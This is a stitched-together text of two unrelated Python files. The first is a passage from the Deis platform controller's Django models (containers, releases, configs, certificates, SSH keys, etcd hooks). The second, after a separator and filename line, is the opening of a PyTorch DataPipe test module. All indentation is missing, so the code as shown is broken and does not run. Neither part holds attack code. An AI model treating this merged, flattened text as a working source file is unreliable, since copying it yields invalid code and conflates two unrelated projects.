for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'aname': self.id,
'num': 0,
'version': version}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.deploy(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (deploy): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in existing]
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self, log_lines=str(settings.LOG_LINES)):
"""Return aggregated log data for this application."""
try:
url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
self.id, log_lines)
r = requests.get(url)
# Handle HTTP request errors
except requests.exceptions.RequestException as e:
logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
raise e
# Handle logs empty or not found
if r.status_code == 204 or r.status_code == 404:
logger.info("GET {} returned a {} status code".format(url, r.status_code))
raise EnvironmentError('Could not locate logs')
# Handle unanticipated status codes
if r.status_code != 200:
logger.error("Error accessing deis-logger: GET {} returned a {} status code"
.format(url, r.status_code))
raise EnvironmentError('Error accessing deis-logger')
return r.content
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
@property
def _scheduler(self):
return self.app._scheduler
@property
def state(self):
return self._scheduler.state(self.job_id).name
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
@property
def job_id(self):
version = "v{}".format(self.release.version)
return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@close_db_connections
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
try:
self._scheduler.create(
name=self.job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def start(self):
try:
self._scheduler.start(self.job_id)
except Exception as e:
err = '{} (start): {}'.format(self.job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@close_db_connections
def stop(self):
try:
self._scheduler.stop(self.job_id)
except Exception as e:
err = '{} (stop): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def destroy(self):
try:
self._scheduler.destroy(self.job_id)
except Exception as e:
err = '{} (destroy): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, **kwargs):
try:
previous_build = self.app.build_set.latest()
to_destroy = []
for proctype in previous_build.procfile:
if proctype not in self.procfile:
for c in self.app.container_set.filter(type=proctype):
to_destroy.append(c)
self.app._destroy_containers(to_destroy)
except Build.DoesNotExist:
pass
return super(Build, self).save(**kwargs)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.viewitems() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
log_event(self.app, e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_image = self.build.image
if ':' not in source_image:
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = "{}:{}".format(source_image, source_tag)
# If the build has a SHA, assume it's from deis-builder and in the deis-registry already
deis_registry = bool(self.build.sha)
publish_release(source_image, self.config.values, self.image, deis_registry)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 0')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
"""
Public and private key pair used to secure application traffic at the router.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
# there is no upper limit on the size of an x.509 certificate
certificate = models.TextField(validators=[validate_certificate])
key = models.TextField()
# X.509 certificates allow any string of information as the common name.
common_name = models.TextField(unique=True, validators=[validate_common_name])
expires = models.DateTimeField()
def __str__(self):
return self.common_name
def _get_certificate(self):
try:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
except crypto.Error as e:
raise SuspiciousOperation(e)
def save(self, *args, **kwargs):
certificate = self._get_certificate()
if not self.common_name:
self.common_name = certificate.get_subject().CN
if not self.expires:
# convert openssl's expiry date format to Django's DateTimeField format
self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
fingerprint = models.CharField(max_length=128)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'fingerprint'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
def save(self, *args, **kwargs):
self.fingerprint = fingerprint(self.public)
return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: release {} created".format(release.app, release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
if kwargs.get('created'):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
def _log_cert_added(**kwargs):
if kwargs.get('created'):
cert = kwargs['instance']
logger.info("cert {} added".format(cert))
def _log_cert_removed(**kwargs):
cert = kwargs['instance']
logger.info("cert {} removed".format(cert))
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
try:
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
except KeyError:
pass
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_publish_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
except KeyError:
# Ignore error when the directory already exists.
pass
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_cert(**kwargs):
cert = kwargs['instance']
_etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
_etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
cert = kwargs['instance']
try:
_etcd_client.delete('/deis/certs/{}'.format(cert),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_config(**kwargs):
config = kwargs['instance']
# we purge all existing config when adding the newest instance. This is because
# deis config:unset would remove an existing value, but not delete the
# old config object
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
for k, v in config.values.iteritems():
_etcd_client.write(
'/deis/config/{}/{}'.format(
config.app,
unicode(k).encode('utf-8').lower()),
unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
config = kwargs['instance']
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_domains(**kwargs):
domain = kwargs['instance']
_etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
domain = kwargs['instance']
try:
_etcd_client.delete('/deis/domains/{}'.format(domain),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
_etcd_client = get_etcd_client()
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
test_datapipe.py
|
# Owner(s): ["module: dataloader"]
import copy
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.graph_settings
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.graph import traverse
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
import pandas # type: ignore[import] # noqa: F401 F403
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
# The temp dir and files within it will be released and deleted in tearDown().
# Adding `noqa: P201` to avoid mypy's warning on not releasing the dir handle within this function.
temp_dir = tempfile.TemporaryDirectory() # noqa: P201
temp_dir_path = temp_dir.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.txt') as f:
temp_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.byte') as f:
temp_file2_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.empty') as f:
temp_file3_name = f.name
with open(temp_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
temp_sub_dir = tempfile.TemporaryDirectory(dir=temp_dir_path) # noqa: P201
temp_sub_dir_path = temp_sub_dir.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.txt') as f:
temp_sub_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.byte') as f:
temp_sub_file2_name = f.name
with open(temp_sub_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_sub_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
(temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: Union[IterDataPipe[T_co], MapDataPipe[T_co]],
n: int) -> Tuple[List[T_co], List[T_co]]:
it = iter(datapipe)
res_before_reset = []
for _ in range(n):
res_before_reset.append(next(it))
return res_before_reset, list(datapipe)
def odd_or_even(x: int) -> int:
return x % 2
class TestDataChunk(TestCase):
def setUp(self):
self.elements = list(range(10))
random.shuffle(self.elements)
self.chunk: DataChunk[int] = DataChunk(self.elements)
def test_getitem(self):
for i in range(10):
self.assertEqual(self.elements[i], self.chunk[i])
def test_iter(self):
for ele, dc in zip(self.elements, iter(self.chunk)):
self.assertEqual(ele, dc)
def test_len(self):
self.assertEqual(len(self.elements), len(self.chunk))
def test_as_string(self):
self.assertEqual(str(self.chunk), str(self.elements))
batch = [self.elements] * 3
chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
self.assertEqual(str(batch), str(chunks))
def test_sort(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.sort()
self.assertTrue(isinstance(chunk, DataChunk))
for i, d in enumerate(chunk):
self.assertEqual(i, d)
def test_reverse(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.reverse()
self.assertTrue(isinstance(chunk, DataChunk))
for i in range(10):
self.assertEqual(chunk[i], self.elements[9 - i])
def test_random_shuffle(self):
elements = list(range(10))
chunk: DataChunk[int] = DataChunk(elements)
rng = random.Random(0)
rng.shuffle(chunk)
rng = random.Random(0)
rng.shuffle(elements)
self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
def setUp(self):
ret = create_temp_dir_and_files()
self.temp_dir = ret[0][0]
self.temp_files = ret[0][1:]
self.temp_sub_dir = ret[1][0]
self.temp_sub_files = ret[1][1:]
def tearDown(self):
try:
self.temp_sub_dir.cleanup()
self.temp_dir.cleanup()
except Exception as e:
warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
def test_listdirfiles_iterable_datapipe(self):
temp_dir = self.temp_dir.name
datapipe = dp.iter.FileLister(temp_dir, '')
count = 0
for pathname in datapipe:
count = count + 1
self.assertTrue(pathname in self.temp_files)
self.assertEqual(count, len(self.temp_files))
count = 0
datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
for pathname in datapipe:
count = count + 1
self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
def test_loadfilesfromdisk_iterable_datapipe(self):
# test import datapipe class directly
from torch.utils.data.datapipes.iter import (
FileLister,
FileLoader,
)
temp_dir = self.temp_dir.name
datapipe1 = FileLister(temp_dir, '')
datapipe2 = FileLoader(datapipe1)
count = 0
for rec in datapipe2:
count = count + 1
self.assertTrue(rec[0] in self.temp_files)
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
self.assertEqual(count, len(self.temp_files))
def test_readfilesfromtar_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
tar.add(self.temp_files[0])
tar.add(self.temp_files[1])
tar.add(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
# Test Case: Read extracted files before reaching the end of the tarfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: Read extracted files after reaching the end of the tarfile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check result accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check result accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
# This test throws a warning because data_stream in side ZipArchiveReader cannot be closed
# due to the way zipfiles.open() is implemented
def test_readfilesfromzip_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
myzip.write(self.temp_files[0])
myzip.write(self.temp_files[1])
myzip.write(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.ZipArchiveReader(datapipe2)
# Test Case: read extracted files before reaching the end of the zipfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: read extracted files after reaching the end of the zipile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check the results accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check the results accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
def test_routeddecoder_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
np.save(temp_pngfile_pathname, png_data)
datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
datapipe2 = dp.iter.FileLoader(datapipe1)
def _png_decoder(extension, data):
if extension != 'png':
return None
return np.load(data)
def _helper(prior_dp, dp, channel_first=False):
# Byte stream is not closed
for inp in prior_dp:
self.assertFalse(inp[1].closed)
for inp, rec in zip(prior_dp, dp):
ext = os.path.splitext(rec[0])[1]
if ext == '.png':
expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
if channel_first:
expected = expected.transpose(2, 0, 1)
self.assertEqual(rec[1], expected)
else:
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1], f.read().decode('utf-8'))
# Corresponding byte stream is closed by Decoder
self.assertTrue(inp[1].closed)
cached = list(datapipe2)
datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
datapipe3.add_handler(decoder_basichandlers)
_helper(cached, datapipe3)
